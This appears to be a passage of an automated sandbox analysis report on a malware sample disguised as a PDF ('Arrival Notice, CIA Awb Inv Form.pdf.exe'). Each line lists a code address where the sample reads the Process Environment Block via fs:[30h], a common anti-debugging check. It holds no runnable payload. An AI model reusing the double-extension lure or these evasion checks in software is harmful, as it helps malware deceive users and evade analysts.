Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA22EB8 mov eax, dword ptr fs:[00000030h] 6_2_1EA22EB8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA22EB8 mov eax, dword ptr fs:[00000030h] 6_2_1EA22EB8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1BE80 mov eax, dword ptr fs:[00000030h] 6_2_1EA1BE80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1AE89 mov eax, dword ptr fs:[00000030h] 6_2_1EA1AE89
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1AE89 mov eax, dword ptr fs:[00000030h] 6_2_1EA1AE89
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAAEEE7 mov eax, dword ptr fs:[00000030h] 6_2_1EAAEEE7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h] 6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h] 6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA21EED mov eax, dword ptr fs:[00000030h] 6_2_1EA21EED
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA93EFC mov eax, dword ptr fs:[00000030h] 6_2_1EA93EFC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA77EC3 mov eax, dword ptr fs:[00000030h] 6_2_1EA77EC3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA77EC3 mov ecx, dword ptr fs:[00000030h] 6_2_1EA77EC3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC4EC1 mov eax, dword ptr fs:[00000030h] 6_2_1EAC4EC1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ECEF0 mov eax, dword ptr fs:[00000030h] 6_2_1E9ECEF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2BED0 mov eax, dword ptr fs:[00000030h] 6_2_1EA2BED0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2EE8 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB9ED2 mov eax, dword ptr fs:[00000030h] 6_2_1EAB9ED2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA31ED8 mov eax, dword ptr fs:[00000030h] 6_2_1EA31ED8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3EE2 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3EE2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EBE18 mov ecx, dword ptr fs:[00000030h] 6_2_1E9EBE18
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3E14 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3E14
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h] 6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h] 6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h] 6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB8E26 mov eax, dword ptr fs:[00000030h] 6_2_1EAB8E26
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA86E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA86E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA86E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA86E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov ecx, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA85E30 mov eax, dword ptr fs:[00000030h] 6_2_1EA85E30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2CE3F mov eax, dword ptr fs:[00000030h] 6_2_1EA2CE3F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F3E01 mov eax, dword ptr fs:[00000030h] 6_2_1E9F3E01
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h] 6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h] 6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h] 6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F6E00 mov eax, dword ptr fs:[00000030h] 6_2_1E9F6E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F2E32 mov eax, dword ptr fs:[00000030h] 6_2_1E9F2E32
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC4E03 mov eax, dword ptr fs:[00000030h] 6_2_1EAC4E03
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA28E15 mov eax, dword ptr fs:[00000030h] 6_2_1EA28E15
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h] 6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h] 6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h] 6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6FE1F mov eax, dword ptr fs:[00000030h] 6_2_1EA6FE1F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAA0E6D mov eax, dword ptr fs:[00000030h] 6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC4E62 mov eax, dword ptr fs:[00000030h] 6_2_1EAC4E62
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAAEE78 mov eax, dword ptr fs:[00000030h] 6_2_1EAAEE78
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2CE70 mov eax, dword ptr fs:[00000030h] 6_2_1EA2CE70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA27E71 mov eax, dword ptr fs:[00000030h] 6_2_1EA27E71
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EDE45 mov eax, dword ptr fs:[00000030h] 6_2_1E9EDE45
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EDE45 mov ecx, dword ptr fs:[00000030h] 6_2_1E9EDE45
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EFE40 mov eax, dword ptr fs:[00000030h] 6_2_1E9EFE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h] 6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h] 6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EAE40 mov eax, dword ptr fs:[00000030h] 6_2_1E9EAE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1EE48 mov eax, dword ptr fs:[00000030h] 6_2_1EA1EE48
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F1E70 mov eax, dword ptr fs:[00000030h] 6_2_1E9F1E70
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov ecx, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6DE50 mov eax, dword ptr fs:[00000030h] 6_2_1EA6DE50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EBE60 mov eax, dword ptr fs:[00000030h] 6_2_1E9EBE60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EBE60 mov eax, dword ptr fs:[00000030h] 6_2_1E9EBE60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1CFB0 mov eax, dword ptr fs:[00000030h] 6_2_1EA1CFB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1CFB0 mov eax, dword ptr fs:[00000030h] 6_2_1EA1CFB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA28FBC mov eax, dword ptr fs:[00000030h] 6_2_1EA28FBC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F4FB6 mov eax, dword ptr fs:[00000030h] 6_2_1E9F4FB6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h] 6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h] 6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA78F8B mov eax, dword ptr fs:[00000030h] 6_2_1EA78F8B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov ecx, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA00F90 mov eax, dword ptr fs:[00000030h] 6_2_1EA00F90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1BF93 mov eax, dword ptr fs:[00000030h] 6_2_1EA1BF93
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F1FAA mov eax, dword ptr fs:[00000030h] 6_2_1E9F1FAA
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov eax, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA06FE0 mov ecx, dword ptr fs:[00000030h] 6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9E9FD0 mov eax, dword ptr fs:[00000030h] 6_2_1E9E9FD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC4FFF mov eax, dword ptr fs:[00000030h] 6_2_1EAC4FFF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA18FFB mov eax, dword ptr fs:[00000030h] 6_2_1EA18FFB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EBFC0 mov eax, dword ptr fs:[00000030h] 6_2_1E9EBFC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA71FC9 mov eax, dword ptr fs:[00000030h] 6_2_1EA71FC9